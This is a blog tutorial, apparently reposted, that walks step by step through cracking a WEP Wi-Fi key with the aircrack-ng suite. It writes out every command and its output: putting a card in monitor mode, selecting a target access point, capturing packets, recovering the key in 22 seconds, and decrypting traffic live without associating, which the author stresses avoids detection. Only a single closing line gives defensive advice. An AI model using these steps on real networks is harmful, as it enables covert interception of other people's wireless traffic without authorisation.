Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
All steps will be run under root super-user as interfaces state needs to be changed.
To Start with
Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run
apt-get install aircrack-ng
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.
root@crack_WEP:~# ifconfig lo Interface doesn't support scanning. wlan0 Link encap:Ethernet HWaddr 00:1a:70:6b:37:4e UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:22 errors:0 dropped:0 overruns:0 frame:0 TX packets:63 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3742 (3.7 KB) TX bytes:10773 (10.7 KB)
Capture packets
The interface needs to be switched to monitor mode.
root@crack_WEP:~# airmon-ng Interface Chipset Driver wlan0 Broadcom 43xx b43 - [phy0]
Airmon has detected interface wlan0. It could be a different name of course such as ath0 for instance.
root@crack_WEP:~# airmon-ng stop wlan0 Interface Chipset Driver wlan0 Broadcom 43xx b43 - [phy0] (monitor mode disabled) root@crack_WEP:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Broadcom 43xx b43 - [phy0] (monitor mode enabled on mon0)
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:
root@crack_WEP:~# iwconfig wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated Tx-Power=27 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
We can now scan for available networks
root@crack_WEP:~# airodump-ng mon0 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:A0:C5:FF:84:72 197 4 0 0 1 11 WEP WEP private BSSID STATION PWR Rate Lost Packets Probes
Scan results show we've got an access point emitting on channel 1 with WEP encryption and which has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets.
root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0 CH 1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:A0:C5:FF:84:72 205 10 6058 24496 0 1 54 WEP WEP private BSSID STATION PWR Rate Lost Packets Probes 00:A0:C5:FF:84:72 00:18:4D:76:30:EB 188 54-54 0 24795
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
Crack the WEP key
It's now time to crack the WEP key:
root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap Aircrack-ng 1.0 rc1 [00:00:22] Tested 240228 keys (got 41742 IVs) KB depth byte(vote) 0 0/ 1 B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640) 1 0/ 1 19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664) 2 0/ 1 31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176) 3 0/ 1 8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128) 4 0/ 1 B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616) 5 0/ 1 61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408) 6 0/ 1 DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152) 7 0/ 1 4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640) 8 0/ 1 FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104) 9 0/ 1 0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896) 10 0/ 1 E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896) 11 2/ 1 FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616) 12 0/ 4 91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ] Decrypted correctly: 100%
That’s right, the key was cracked in 22 seconds!
Decrypt the traffic
It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:
root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap Total number of packets read 22072 Total number of WEP data packets 6245 Total number of WPA data packets 0 Number of plaintext data packets 3 Number of decrypted WEP packets 6245 Number of corrupted WEP packets 0 Number of decrypted WPA packets 0 root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.
root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0 created tap interface at0 WEP encryption specified. Sending and receiving frames through mon0. FromDS bit set in all frames.
From another shell:
crack_WEP:~# tcpdump -i at0
Conclusion
It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA with non-dictionnary based passwords.
'위험한_친구들 > 그림자_WIFI' 카테고리의 다른 글
WLAN Security (0) | 2011.09.15 |
---|---|
Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran (0) | 2011.09.15 |
[spanish] Asaltando redes wifi (0) | 2011.08.16 |
Tutorial: How to Crack WPA/WPA2 (0) | 2011.08.10 |
WIFI와 스마트폰 (RogueAP) (0) | 2010.10.28 |